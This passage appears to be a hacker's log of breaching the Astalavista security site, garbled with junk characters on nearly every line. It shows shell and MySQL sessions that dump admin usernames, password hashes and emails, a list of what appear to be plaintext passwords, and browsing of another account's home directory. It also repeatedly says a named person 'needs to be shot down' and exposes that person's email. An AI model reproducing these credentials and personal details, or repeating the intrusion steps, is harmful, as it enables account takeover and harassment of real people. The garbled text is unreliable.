4 O' O2 l9 r% ~, k* p<rss version=”2.0″>
% \4 A+ o; u8 J7 w% g# _ <channel>- U! a: l$ ]3 j
<title>ASTALAVISTA.com - Exploits</title>
. V& F2 _' _. | <link>http://www.astalavista.com/exploits</link>5 D- E$ @2 n2 T, o
<description>All availably Exploits.</description>
3 @* O3 Z' r! P <language>en-us</language>* z8 A" ]( x! }" A6 V
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
, W- \0 Z. g- N9 B) e <docs>http://blogs.law.harvard.edu/tech/rss</docs>
4 k/ X! }' E% \ <generator>Astalavista.com</generator>
/ E J! f y4 {; N <webMaster>info@astalavista.com</webMaster>’ . $items . ‘- E& W) h/ M( M; k9 Y
</channel>$ |/ l% F, R8 a: l: R: f1 ]0 `
</rss>’;
- m" u9 X* ?+ f0 V$ {$ x4 L9 M# |: ?; h9 |
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {6 U x) z% ^' h+ B2 H& j5 {
unlink (FULLPATH . ‘/feed/exploits.xml’);
: T, t( g3 L4 t e% O0 }) |/ d% ]9 o* W }
8 U+ f: E1 p% x4 i3 z5 h) T4 o+ E6 z$ b6 X, Z4 S
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
, Q8 C7 u7 o$ ^8 g[snip]
( H5 [( i. J/ [' A' x" S0 Y: f3 `3 `3 z' X( e3 t3 x: }* r. v
sh-3.2$ cat exploits.sh
1 L: h, T+ u, G#!/bin/sh$ e) f. n5 k* }$ S
7 p4 [6 C2 Z7 r& j. h' {###########################################################. A! B: d2 B, q5 {( p3 I
# #
# |9 f# f! z% @5 l4 c/ ~. v# Title: milw0rm exploits adder #
0 [/ W. z; }% E" ~# Description: Add all milw0rm exploits to the #
" K/ F/ X7 o, `2 i5 g: L1 X# Astalavista.com database #/ f# _; z" q5 D+ P5 C! w$ ~
# #
$ q, P, g- r8 `8 @# Company: Astalavista Group #
+ n! B4 e4 g0 [+ J+ R# Author: Paulo M. Santos #9 Q6 N. T: p+ Z5 U$ P i, s% s
# E-Mail: 链接标记paulo.santos@astalavista.ch #
2 z& r) n/ n* q8 G+ b2 _- p# #* R) S9 [% o5 ]1 T# L1 \$ H3 P6 @. c
###########################################################
! _/ a* E, [5 f4 ]" R5 w4 m# t1 r( O1 i2 k
# path
. B. F- o/ y0 O; Dthis_path=/home/com/public_html/modifications/cronjobs+ b3 p$ |+ m* z9 a, [% Z
) X" P4 K0 ]: B/ C5 K. d# change directory
' ~* [5 n6 q' w3 d. `cd $this_path
5 b. M; Y8 t" C# C7 X- Xcd tmp/. ~4 ^- M/ `& u: j
& Z' h6 I5 y% d7 J
# delete files
: r( X2 x0 X- ^/ r' h$ Yrm -rf milw0rm.tar.* &0 x( k, h% X$ z' Y! b" ~
rm -rf milw0rm/ &0 O, u( |7 c$ g- ?5 V
# U8 r/ _1 ?( h9 c. j- [) N
# wget milw0rm paket" c4 c% T Y% j) P: U* i5 G
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
1 o( L3 I( J! K0 v B) b: f; H1 z+ W( Q1 w
# extract milw0rm paket2 ~/ i* s& l) f
tar -xvf milw0rm.tar.bz2
! i4 \" N( b0 n- F6 }
' `$ [) H# a* ~+ `& N2 r# change owner7 A$ b$ p! a2 r+ o& x" G
chown -R com .( F+ \( V: z: g* C m
chgrp -R com .
! z. ~2 U' w' c2 R* J. `" Z) \6 n- x& B8 v% ~
# execute php script
1 V, H6 W! `$ W rcd $this_path
3 Q! M( E; ^! H- K! B) p% U* o3 Xphp -q exploits.php
( _8 d/ L& A+ B6 @. O8 h; o! K4 m
# delete files
j! Y- J3 M d `1 y* jrm -rf tmp/milw0rm.tar.*1 Z O) @! m, Q; h% t6 ?
rm -rf tmp/milw0rm/$ {/ c1 a! Q+ T; n" g! ]) i: Y
" I8 }- [( W8 m8 _" \/ dsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
' y' f: m% D9 C8 P" t* V5 jPaulo M. Santos needs to be shot down.
$ T, y' [/ ?; d6 x- h
$ t. m# B) ]# p2 I% T Rmysql -u contrexxuser2 -p; a7 y9 A. G5 U8 e S$ g8 u
Enter password:
& b. d+ o+ }8 v8 F& E6 UWelcome to the MySQL monitor. Commands end with ; or \g.
- R- s2 }/ G$ ]) R& b9 a$ |Your MySQL connection id is 261694
% j( ]/ d6 |; m6 t; i | }; BServer version: 5.0.45-community-log MySQL Community Edition (GPL)* S, t/ k: {4 @8 I( k
3 F& `# l0 H2 B- t# |! X$ ^ _
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
/ s: l1 | m3 Q% f: H
7 X& L u& _0 P" |: @mysql> show databases;6 L. B5 q1 v( H0 p9 r6 ]
+——————–+: C0 B" c$ |- r
| Database |9 C5 e9 D: |8 T9 c
+——————–+, z4 F$ T9 E6 n, h" J' ~; @
| information_schema |
+ a4 n$ n6 i$ @. ^; }5 s. D| com_contrexx2 |% b% y0 V1 n) T$ F" _7 ?
| com_contrexx2_live |+ I5 {6 O' C1 m% I
| test |
+ X: F# R6 _$ w! U3 j+——————–+$ Z% r' _" \% ]
4 rows in set (0.00 sec)
, Q) e, `8 @1 H3 N
* F. L4 i8 w/ W' p/ q2 H0 p0 U* bmysql> use com_contrexx2_live. j; O$ D! k$ T. U, P% ?: X
Database changed0 y5 c) ?! J2 Z! u) [
mysql> show tables;- k _. Z* e) r D/ r" }5 O$ \
+————————————————–+" q( g' H) x3 p3 j
| Tables_in_com_contrexx2_live |. G3 f m4 u0 y _4 I U) a- A( c
+————————————————–+
: C' Y# v9 H' j" {| cc_banner_counter |0 }+ }/ q1 U0 n
| cc_search_counter |
3 l1 d* ~' F. L/ K% c* L9 N, C| contrexx_access_group_dynamic_ids | |. N4 p2 H( I3 V4 t6 ^! B: u
| contrexx_access_group_static_ids |5 l, s, c; g% H4 P6 [+ W% Y
| contrexx_access_rel_user_group |
+ N/ f& K+ R; i E/ i! _/ \' o; b3 G| contrexx_access_settings |
/ c9 p1 G# H0 r" O| contrexx_access_user_attribute |
0 g: Y* y: t$ Q: H8 R. I& X5 d, S| contrexx_access_user_attribute_name |- P; Y2 ~3 K; X" [/ s" J3 s- ?' s
| contrexx_access_user_attribute_value |! }8 E' v0 A" W/ I( `2 v" b
| contrexx_access_user_core_attribute |3 {/ U8 G7 U1 x
| contrexx_access_user_groups |
! f" t- x3 T6 l* i6 p; c b| contrexx_access_user_mail |
7 e) n4 t4 @3 G9 S1 N! m| contrexx_access_user_profile |, v, G" B0 p9 Y% i; _" }
| contrexx_access_user_title |
% L+ k; }# T6 B2 n* K1 `: ~! {4 Z4 W5 o| contrexx_access_user_validity |
( d# l9 l' _. ~, d8 r| contrexx_access_users |
* J$ Y: k: }" E5 w1 H- y" H| contrexx_backend_areas |7 G8 o/ G9 G. O( p
| contrexx_backups |( V* `1 a5 {$ e
| contrexx_content |
& S' H& E( v* W& z| contrexx_content_history |* \: d4 t) k% o' r: N- n8 M6 Q6 v0 z
| contrexx_content_logfile |
" D& u' M% g2 \' w| contrexx_content_navigation |% Y% A( ~3 |) }) d$ v: P
| contrexx_content_navigation_history |. ~% W/ W- \, R2 E- B
| contrexx_ids | b/ m3 h5 y/ N" A. e, A" I9 G
| contrexx_languages |
" {- |% J! M3 }& K| contrexx_lib_country |' F$ C( H# N# w9 H( k
| contrexx_log |
. T4 F2 |$ w- r8 T3 \9 M. A" ]| contrexx_module_alias_source |. W8 ~8 g6 h, b- y6 M, T
| contrexx_module_alias_target |) y& k0 h6 h8 f' x# _& [
| contrexx_module_block_blocks |! }0 l' {; S( w1 @# Y
| contrexx_module_block_rel_lang |
8 t; j3 C! k( Y| contrexx_module_block_rel_pages | Y% S$ z/ H R7 k: A/ B
| contrexx_module_block_settings |) t& h3 P2 r L4 [2 i
| contrexx_module_blog_categories |7 b) o: k& s: n* Z" o
| contrexx_module_blog_comments |
# ^7 w1 F) E% d9 O| contrexx_module_blog_message_to_category |
3 z5 y1 \' b7 {3 a. O: y' j| contrexx_module_blog_messages |4 u9 I ~3 Z3 X" F2 i+ N, z m+ ?' G
| contrexx_module_blog_messages_lang |
W! S( ^/ c U- B2 e| contrexx_module_blog_networks |
" M) Q2 ?) B; @2 Y; X| contrexx_module_blog_networks_lang |
& k3 u: ?; O4 ~- }+ N| contrexx_module_blog_settings |, Y. V. s* Q' c3 A9 Q. u
| contrexx_module_blog_votes |
# i/ c: q# p5 o| contrexx_module_calendar |
2 {* F- V8 i8 a; f% m- w* f }| contrexx_module_calendar_access |' {, T. _" ~1 _: ~/ n
| contrexx_module_calendar_categories |
: H# p, L5 S3 V) G- }/ e, S/ p| contrexx_module_calendar_form_data |
) ?! I; l$ Y; x- j+ U+ D' ^| contrexx_module_calendar_form_fields |
* c' q. G8 y( c( \' [! L9 B: ^| contrexx_module_calendar_registrations |. r% s- L* k) W% z7 D' N1 f: t
| contrexx_module_calendar_settings |; s, S- V! L9 x3 L5 s: N4 ]
| contrexx_module_calendar_style |
$ K6 t8 D. d+ z: x! s: h3 G4 I! T9 W5 Z8 V| contrexx_module_contact_form |6 C( z# e, b( K# l5 K# r/ ~
| contrexx_module_contact_form_data |9 N& y! _2 o& i _" @3 i. W$ w8 Q# D
| contrexx_module_contact_form_field |$ E1 Z# o/ [3 c+ O: D- ]6 ~4 p: C
| contrexx_module_contact_settings |
- n* H6 d1 _" i- ~1 T; D! e- U3 e| contrexx_module_data_categories |
" ] i. i& G; o* R. S| contrexx_module_data_message_to_category |
: |; j5 q7 m7 d: W& t| contrexx_module_data_messages |6 t; [$ ?) e- } z
| contrexx_module_data_messages_lang |# R! g/ c- ?0 L3 X! q
| contrexx_module_data_placeholders |# @ f) e2 Q9 t2 b* l; m7 @5 @
| contrexx_module_data_settings |
" C. @: ^0 j) H4 ?; L| contrexx_module_directory_access |
0 u! m) u2 R$ o$ [1 M! k| contrexx_module_directory_categories |
* A* _( |& a" M( S| contrexx_module_directory_dir |& u6 V3 L+ c1 v9 U. A# `
| contrexx_module_directory_inputfields |) Q* \$ {1 a2 S, X
| contrexx_module_directory_levels |! z- \3 E( J# L% p( T# a5 _
| contrexx_module_directory_mail |/ K& _) B4 j' a. s' q
| contrexx_module_directory_rel_dir_cat |
5 k4 C Q1 M' x N' C| contrexx_module_directory_rel_dir_level |0 N* m: p( M% M# u" e9 m. p
| contrexx_module_directory_settings |5 a1 ]9 ]/ ^( M
| contrexx_module_directory_settings_google |
& e# ?: ~( E' u( O' x( c| contrexx_module_directory_vote |
) v# k& C' L( L9 E$ M, h+ _| contrexx_module_docsys |6 Z! h+ B d7 p _. Q2 D9 j
| contrexx_module_docsys_categories |- y X3 \* t: n' _+ v
| contrexx_module_egov_configuration |
$ u2 B6 i! H2 T| contrexx_module_egov_orders |- w6 O- ~4 x- ~% E
| contrexx_module_egov_product_calendar |
2 |- ]; V% a0 m1 \( s| contrexx_module_egov_product_fields |
6 a8 Q, F9 D/ S8 `& d* ~/ ]| contrexx_module_egov_products |
; A/ K. _% r' t$ e/ F1 @| contrexx_module_egov_settings | C1 p+ L" _8 i4 {
| contrexx_module_exploits |
! o4 a% D: k0 G0 p; l| contrexx_module_exploits_categories |
9 P& I+ v6 I; ~% z3 b* A| contrexx_module_feed_category |
1 d( q, ^$ b* n| contrexx_module_feed_news |
5 B9 e/ w$ E6 q( z T| contrexx_module_feed_newsml_association |, H U+ E0 i- Y
| contrexx_module_feed_newsml_categories |
3 U' b- m1 Z6 b| contrexx_module_feed_newsml_documents |
$ L9 a9 @7 u+ S| contrexx_module_feed_newsml_providers |' z7 S* j% k$ K4 `) z+ v5 I& Y
| contrexx_module_forum_access |. R7 Q0 O, ]% h+ R9 q! `
| contrexx_module_forum_categories |
; r3 v" {2 w* d! c| contrexx_module_forum_categories_lang |
* Y% ` |* h% h2 P, }6 w| contrexx_module_forum_notification |& p+ W% u9 C2 a& ?4 O
| contrexx_module_forum_postings |! M4 X+ d8 A5 t: l! F
| contrexx_module_forum_rating | v* X F' A0 X9 U; }. l* V& {
| contrexx_module_forum_settings |' P/ z% s* I( D( k8 A+ N
| contrexx_module_forum_statistics |% @6 S& P+ N5 r; R5 k
| contrexx_module_gallery_categories |
' q/ K3 w. o# a5 x8 t| contrexx_module_gallery_comments |
; \7 l2 A! f$ I# \ ^6 }| contrexx_module_gallery_language |
' w) D! z2 a% p! _. K5 P! H! ]& Q1 V| contrexx_module_gallery_language_pics |4 v" H2 J) n. l: _: J
| contrexx_module_gallery_pictures |
$ S) \$ A) w; t# T4 H| contrexx_module_gallery_settings |" U& R1 A- q2 {
| contrexx_module_gallery_votes |
* Q- W9 x$ U- O& D! C| contrexx_module_guestbook |5 O7 ?3 Q. F4 }
| contrexx_module_guestbook_settings |
/ L- z4 I5 F8 Q# H( M7 x| contrexx_module_livecam |) I7 u# E* [) _2 R2 }
| contrexx_module_livecam_settings |) S" Z! z" u6 M7 @- f
| contrexx_module_market |# z7 [( A3 }2 `3 x
| contrexx_module_market_access |& ^ G" s z+ p' V4 c
| contrexx_module_market_categories |1 M% W! u0 t' s5 ]2 n8 U
| contrexx_module_market_mail |. N( S" t$ l' L7 Q& N
| contrexx_module_market_paypal |: h( z- ?/ N6 K. f0 E: ?1 U& i1 H: j- ^
| contrexx_module_market_settings |8 x& d0 q/ Y7 i5 }1 ?
| contrexx_module_market_spez_fields |4 i/ X) X `5 Z9 {- |- g- [* C4 }+ S
| contrexx_module_mediadir_access |. F0 I( R% q4 Y5 a& a0 ]
| contrexx_module_mediadir_categories |
( ~( v" S1 ?; f) w1 }7 Z, s. J( r+ P! w1 B| contrexx_module_mediadir_comments |* d) v, u' T$ `6 X8 a! P4 s7 A
| contrexx_module_mediadir_dir |
5 F& {- p$ H% R2 l5 M| contrexx_module_mediadir_inputfields |
* `5 Y r5 ^- S8 I3 Z| contrexx_module_mediadir_levels |- [" I" E0 T0 H" m6 M. i# b
| contrexx_module_mediadir_mail |
) n, V. ], d, }3 P$ J: ]| contrexx_module_mediadir_rel_dir_cat |$ @& Q6 T+ u7 M& R! t& J9 z2 o
| contrexx_module_mediadir_rel_dir_level |
3 v; h7 r; G, {! h( J: y| contrexx_module_mediadir_reports |
: R( W" k/ \1 Z% K) ]+ K| contrexx_module_mediadir_settings |' h& [. |0 ^3 g ?
| contrexx_module_mediadir_settings_google |/ C( ]4 r' o9 F% G% |) |6 s
| contrexx_module_mediadir_vote |
3 V% Q! ~ e6 y& }0 r; t9 t| contrexx_module_memberdir_directories |& }! f3 S+ z+ N5 H
| contrexx_module_memberdir_name |8 b: `. X \+ I0 {
| contrexx_module_memberdir_settings |
1 ^* {. I4 P0 z/ y3 V; W( j- M1 }& o| contrexx_module_memberdir_values |2 K2 Z2 g' M( j3 f2 [4 j
| contrexx_module_nettools_allowed_groups |
. R3 C3 W5 c" e* r X& r| contrexx_module_nettools_settings |
2 v+ K* Q& a2 c| contrexx_module_news |) ?5 e, z; D. d" x0 }
| contrexx_module_news_access |; I- |1 W+ r n U! I' H6 V. y( v
| contrexx_module_news_categories |
: K# `" d- ^( [" || contrexx_module_news_settings |
; [7 g7 W7 G% R| contrexx_module_news_teaser_frame |
/ l0 a* g" h7 Q| contrexx_module_news_teaser_frame_templates |% u' H% [- e* p ~+ \# s2 L% E/ _4 o8 S2 |
| contrexx_module_news_ticker |
, C4 t, W" V. R8 E| contrexx_module_newsletter |* L) w8 ^! r0 ?
| contrexx_module_newsletter_attachment |
# {6 Y9 |. u9 B| contrexx_module_newsletter_category |1 r1 ~( i: {, L9 s; k3 b* B
| contrexx_module_newsletter_confirm_mail |+ r" z0 k. e( U; @9 q
| contrexx_module_newsletter_rel_cat_news |. O6 o+ Z( d% x0 w5 ^3 V
| contrexx_module_newsletter_rel_user_cat |5 r; q* N; V W2 S) z6 _$ @4 h
| contrexx_module_newsletter_settings |! T# B4 L- V: w4 w9 Z# c% Y; r S% Q
| contrexx_module_newsletter_template |
0 H* Q% c1 Y( p* t" P5 Q, A| contrexx_module_newsletter_tmp_sending |
# _8 k3 M4 G, Y" R( u- u| contrexx_module_newsletter_user |
, h) V% s+ S% [! R! Q| contrexx_module_newsletter_user_title |! C* d. Q3 ~% ^2 h" Y
| contrexx_module_onlinetools_defaultports |9 Z8 A2 ^2 c+ X0 ^9 M" M% S- v
| contrexx_module_onlinetools_defaultports_back |
+ U4 n8 l, ?2 i s" W| contrexx_module_onlinetools_geolitecity_blocks |* g b; Q# }- Q
| contrexx_module_onlinetools_geolitecity_country |
' m. N& s& d7 P- f$ B2 C1 l| contrexx_module_onlinetools_geolitecity_location |
, g! m+ {+ V% J* K, Z( C6 w. E& ]| contrexx_module_podcast_category |
# V+ |+ x7 p1 H8 q| contrexx_module_podcast_medium |
, _$ e4 u, E9 a| contrexx_module_podcast_rel_category_lang |
; ]6 ]: M, W9 v% t7 o* ], d+ I, g| contrexx_module_podcast_rel_medium_category |
+ M7 L4 {, F( h| contrexx_module_podcast_settings |
3 ]8 Z+ v/ s3 k7 Y1 Q- ~+ I) J| contrexx_module_podcast_template |' I' P6 o4 m8 G% Z- m) G* Z+ e
| contrexx_module_proxydb |
7 e" w* J# j0 v4 `6 I. D! E| contrexx_module_recommend |4 d# o3 C8 w; M8 b, s
| contrexx_module_repository |
3 |2 x* o0 ] g, i| contrexx_module_securitynews_cats |( B/ f* U z F% N0 r" j+ w+ p
| contrexx_module_securitynews_feeds |( s$ d% r. A( s& g( J( c" s
| contrexx_module_securitynews_news |1 u+ C# r2 f4 M) m4 J% l8 T% j
| contrexx_module_shop_categories |: |7 i: d& g5 ^2 `1 Y' j
| contrexx_module_shop_config |
; Q. N2 k# e. {3 X| contrexx_module_shop_countries |$ P5 R) n+ Q1 D. |5 Z
| contrexx_module_shop_currencies |
6 O7 X5 m) q& V- l9 U _: D9 L) b| contrexx_module_shop_customers |
\* f, L* b& k/ U" D' |+ R| contrexx_module_shop_importimg |( C% _2 k( X) D3 S: M& e
| contrexx_module_shop_lsv |
# ^+ e! J" o1 x7 D| contrexx_module_shop_mail |+ X+ {( E( N" {- {4 L) L, Z
| contrexx_module_shop_mail_content |) b2 w- O+ k) M6 P) N
| contrexx_module_shop_manufacturer |$ V" _- p- a/ B9 O( Q9 e% ^% t
| contrexx_module_shop_order_items |
& s) x) d" J: J! K% n| contrexx_module_shop_order_items_attributes |
, m0 } O; x; ]" }: W2 q| contrexx_module_shop_orders |. F# @4 [0 ]* R6 _" H
| contrexx_module_shop_payment |
/ l @8 [( d; w! F6 b3 ]+ K- M, || contrexx_module_shop_payment_processors |
) V2 B4 F" w2 E7 D4 v- s| contrexx_module_shop_pricelists |
4 B2 P- i' K! e" v' u| contrexx_module_shop_products |
% }: M% T3 V. V3 x1 l1 z6 \| contrexx_module_shop_products_attributes |/ @( d2 M2 z; b
| contrexx_module_shop_products_attributes_name |0 T, x' Y8 Z; v% Z9 Q/ O5 M* W4 b1 ^
| contrexx_module_shop_products_attributes_value |
# p7 C2 j( B, z p4 `7 v( T& w2 l| contrexx_module_shop_products_downloads |
1 j, d) X3 q! M# c( d/ n| contrexx_module_shop_rel_countries |
9 O# d' P2 p; p l6 o| contrexx_module_shop_rel_payment |$ _+ }8 \$ ?7 T) S" A; u
| contrexx_module_shop_rel_shipment |1 D. S% i9 G4 e) c
| contrexx_module_shop_shipment_cost |7 s4 w/ d& F: B0 p. \& C
| contrexx_module_shop_shipper |
, D9 l$ d1 v; c4 N8 R& \2 U9 k| contrexx_module_shop_vat |; j" t, [" x+ N7 L0 y! p
| contrexx_module_shop_zones |
. o( Z( |% H0 L# K% g. R| contrexx_module_u2u_address_list |
$ T, M% R' M: s& ^/ u- d2 W( N, O5 \| contrexx_module_u2u_message_log |+ ~+ h7 q. e% D9 [. o* T! q
| contrexx_module_u2u_sent_messages |( b% @7 E8 K& v
| contrexx_module_u2u_settings |0 M T0 k" G9 g. j# B; O
| contrexx_module_u2u_user_log |1 Q3 [7 R' H7 ?! F- \ P
| contrexx_modules |
& l7 A6 T6 m9 P* ?- N- l| contrexx_sessions |
# a( e. g7 [8 T7 W5 _; @# C| contrexx_settings |$ I+ {; S6 e" q
| contrexx_settings_smtp |
5 b4 c7 q6 c. @. ^. N2 j6 C| contrexx_skins |( v% f. o! @1 a5 n b
| contrexx_stats_browser |. ~& }! L. f7 l" y1 o: E% ^* k5 C6 B
| contrexx_stats_colourdepth |( p5 J5 y5 {9 c! y) c. o8 U# ~
| contrexx_stats_config |
( F. }6 z) \4 m2 x| contrexx_stats_country |
% F; a: ]' x8 F% h4 T/ C% L" D+ A| contrexx_stats_hostname |1 [( D9 C p$ p! S* O3 {7 J8 `' s
| contrexx_stats_javascript |3 @7 P4 ]2 i% c+ w3 \
| contrexx_stats_operatingsystem |
& A( Q0 r/ \# |( [9 F: i| contrexx_stats_referer |4 W( m& ]: w/ L4 J' `7 L+ ~6 R
| contrexx_stats_requests |; G6 \+ z" F' a- Y" U
| contrexx_stats_requests_summary |
+ y! ], y: e" ^+ |; W| contrexx_stats_screenresolution |
; a$ {+ {. O+ n( Q$ k| contrexx_stats_search |
0 s" v, T3 b" ?- j| contrexx_stats_spiders |
6 \! @$ ~, Z0 E. x7 X1 w# q* q| contrexx_stats_spiders_summary |
" z9 P0 }, I4 |7 T9 j3 W, \8 `( |4 J6 {| contrexx_stats_visitors |
' Z# t5 f8 \1 ^) q8 ?! g; H% Z| contrexx_stats_visitors_summary |
0 k3 | U ]+ \! k. J( F| contrexx_voting_additionaldata |
2 p" n: Y0 P0 D, [| contrexx_voting_email |$ v. U t' U. o" \' F( ^
| contrexx_voting_rel_email_system |
# ?/ t0 O9 _ {& h| contrexx_voting_results |
& A( T/ v& E# N8 V| contrexx_voting_system |
3 f- C$ ?( T6 ?, O" A( [' H| foo |
- U, _ {/ M* ^$ d4 h* t+————————————————–+
( W/ \! l- @& w1 ~4 R j& Q227 rows in set (0.01 sec)
6 \ @8 m& s: s
' c' [) e3 ~% I7 i# U5 Umysql> select count(*) as skids from contrexx_access_users;
: [/ I; W$ u; E9 c+——-+
. B0 u" W% ?* ~& D' b| skids |
4 z1 \$ C2 J" `3 v# z" A( |' O+——-+" M4 C% D8 ~7 r8 L4 R
| 53699 |
) a+ G9 c% i$ i$ [4 t+——-+
8 a/ Q9 Y; ^7 F& A" T4 m1 row in set (0.00 sec)
0 G; w: B1 D0 [0 y# h) p' k6 U4 Q, m
mysql> describe contrexx_access_users;
. H$ x `- r0 C: A( u& d' v+——————+——————————————+——+—–+————–+—————-+* r2 G8 n& l/ y. B1 W0 A, F
| Field | Type | Null | Key | Default | Extra |' R% g/ `0 n4 N
+——————+——————————————+——+—–+————–+—————-+
9 k5 z5 y* L7 f# |* R4 \| id | int(10) unsigned | NO | PRI | NULL | auto_increment |- D3 y, w' B/ A" t3 K
| is_admin | tinyint(1) unsigned | NO | | 0 | |
- Z; b2 v3 |% Z) v) c8 c. r/ Q| username | varchar(40) | YES | MUL | NULL | |. e) D& n" g# A1 q$ H
| password | varchar(32) | YES | | NULL | |' o/ _; p1 |# d# H% T% q
| regdate | int(14) unsigned | NO | | 0 | |- t E' k4 N' d; ^0 K& x+ q* t
| expiration | int(14) unsigned | NO | | 0 | |, b$ t1 M, v4 Y1 x3 v/ s
| validity | int(10) unsigned | NO | | 0 | |& I" F% I2 U( S
| last_auth | int(14) unsigned | NO | | 0 | |( s0 |3 {" g8 S' S5 R0 D* d; k# A
| last_activity | int(14) unsigned | NO | | 0 | |
' _ W5 H# l- c9 T| email | varchar(255) | YES | | NULL | |
7 k: |$ q8 d* |; K* P| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |. T$ H }6 X6 J! I
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
5 a) A. D/ p2 N+ A5 e; j' K8 ~| backend_lang_id | int(2) unsigned | NO | | 0 | |
$ z5 b9 v6 {2 d5 W `| active | tinyint(1) | NO | | 0 | |
1 w. Z5 r+ T$ o| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |7 l+ w. N+ Z* t
| restore_key | varchar(32) | NO | | | |& X. H8 A' k; r2 H. A5 M4 y2 {
| restore_key_time | int(14) unsigned | NO | | 0 | |
$ q& s9 f, M# C- z: [| u2u_active | enum(’0′,’1′) | NO | | 1 | |
6 h. V8 l9 A6 Y+——————+——————————————+——+—–+————–+—————-+0 ~: z8 A# Z# B9 q' r: ?
18 rows in set (0.00 sec)' C# V/ p6 a2 K
7 M) Z) S& V* y, B1 z: Qmysql> select username,password,email from contrexx_access_users where is_admin = 1;
+ d5 p# U' ^, j% Q0 S# c; M+————+———————————-+—————————–+
( r/ Y$ b$ @1 o. I| username | password | email |5 y+ X' Z* f( P! {3 v+ O
+————+———————————-+—————————–+/ m ~% |6 A- I" U
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |' p5 q4 d# i& Q* K. V; c' F, o g
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
( O% A- m0 X1 E" F! C2 u5 G| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |4 F4 L; S+ K( B, P
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |0 J4 |4 F" A2 O; W u0 |
+————+———————————-+—————————–+
+ w" J% [/ f- U9 q+ Y0 V4 rows in set (0.04 sec)" t- E c6 X5 I
4 H r7 o: V4 r
mysql> exit;
' K' x- ] W4 m+ a. bBye; m' y. U) |. E8 k) d% ?
' h7 d- Z, m* ^ }7 r[~] There you go, your “team of security and IT professionals” is a joke.
# p( a# ?, X8 N% k' O
5 D/ v& P9 ?; ^' L! p1 `+——————————+% \0 U" g) a4 R: m
system:f82BN3+_*
+ D5 y& Q+ q c& x( XBe1er0ph0r:belerophor4astacom! F a: D; E, d4 z+ P
prozac:asta4cms!
/ _; I6 a6 `& p" ?8 f+ b- j) ccommander:mpbdaagf6m; U* J/ p5 J' o) Z7 w
sykadul:ak29eral
$ Z% v0 t* ]3 K# ^% a/ H$ j6 n+——————————+
2 ^$ A7 F( W+ I; H1 i% k G- l/ Z: w, } ?' r
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s), m3 D- `, d1 `+ Y+ o/ s3 v# O% W2 |
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
3 y) O- N& T/ }9 z. g+ X
5 x" j8 \. Q/ z R+ w3 t" V# E, t2 U[~] Lets move to astalavista.net now," @* K8 U* D1 [/ D7 f1 ?
" t% ^, a( T/ D& n1 Y- B* e6 ?% rFrom <链接标记[url]https://www.astalavista.net/[/url]>:$ P% C# P( n& V7 c0 u$ ~7 S: S
>> Everyone knows that the best defense is a good offense.& x4 @) x' A$ N
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy. T9 z! S/ |5 |* r; l
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world./ ]( I, S; h X$ x U# H E0 o0 K
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
6 P8 ?: Z# X, r/ S' u! s- A& U; j' Y- [: o- _' r# ~* k* r" ?: E- M
>> Go ahead, try and hack our server . in a completely legal way!
; z4 A2 ?* V* Y) [>> Learn by doing: We offer our members tricky tasks and challenges on an
3 j. V6 k" z" x( Y>> ongoing basis so you can test your knowledge and abilities. You can also
' g: L3 v+ k8 l& [! c>> demonstrate what you.ve mastered by taking part in regular hacker contests. ^. w& k2 d2 T. ]
>> and war games! `. o3 ^. J' V8 y3 O
; W$ [0 z1 @) }1 x6 ^, `
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!3 e* ~4 j% _( J0 }, e( v
, w$ |1 r6 ]8 |2 h* c* L# g* ~/ y
[-] Tricky task: Find home dir of astalavista.net
& P5 h. `: ~, w3 _( \+ H' \
5 |( s8 u% I! h( c: g n: [7 rsh-3.2$ ls -la ~astanet3 q# l0 B/ g4 a& |" e' n% b
total 48
+ Z4 ~3 |5 V9 @3 n% \8 A! [( d5 ]drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .* p% A/ z% L, [$ V+ n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ V& w4 S/ ]# g7 ]; B
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
% E1 [8 ~* S+ ]$ ^1 \8 D8 o-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history8 e. q+ C4 c; Y9 a. f2 e& X( X5 i
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout) V. x a. O. u1 `4 ?
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile' W4 D, d# R5 y; m
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
O7 w3 K" Q" w: wdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains6 `$ t1 U4 z$ H/ t/ Y/ d5 N
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap- o$ f$ t4 z: |" L
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
9 M+ w, {1 v c7 \lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html. V& |8 Z+ T, ~3 q; v
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
$ R3 c } ~7 v. I8 p! B
& S3 l2 z. l% ]& T. k3 Msh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
5 w1 j \! q: x8 q" v3 ysh-3.2$ ls -la1 y2 b) a' N m8 }8 {
total 200
